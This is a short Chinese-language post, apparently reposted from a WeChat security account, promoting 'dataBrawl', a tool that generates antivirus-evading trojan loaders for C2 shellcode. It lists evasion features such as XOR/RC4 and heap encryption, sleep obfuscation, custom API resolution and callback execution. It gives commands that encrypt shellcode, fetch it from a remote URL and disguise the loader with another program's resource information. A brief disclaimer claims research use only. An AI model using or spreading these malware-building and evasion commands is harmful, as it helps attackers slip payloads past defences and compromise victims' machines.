===================================
0x01 工具介绍
一款一键化生成免杀木马的shellcode免杀框架,具备本地加载方式和远程加载方式。本工具没有追求多而全的加载方式,去除经多次测试无效的加载技术,保留了最实用最接近APT的利用方式。目前已支持:
分离加载shellcodeXOR/RC4 加密堆加密自定义sleep混淆自定义GetProcAddress/GetModuleHandle回调执行shellcode一键添加资源信息
0x02 安装与使用
一、帮助命令
python dataBrawl.py -h
二、远程加载shellcode,CS或其他C2生成shellcode
生成处理后的bin文件
python dataBrawl.py remote D:DevdataBrawl-1.0calc.bin -c 1将生成在根目录的encrypt.bin上传到服务器
python main.py remote http://127.0.0.1/xorcalc.bin -i D:TyporaTypora.exe
0x03 下载链接
原文始发于微信公众号(网络安全者):一键生成免杀木马的 shellcode 免杀框架
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论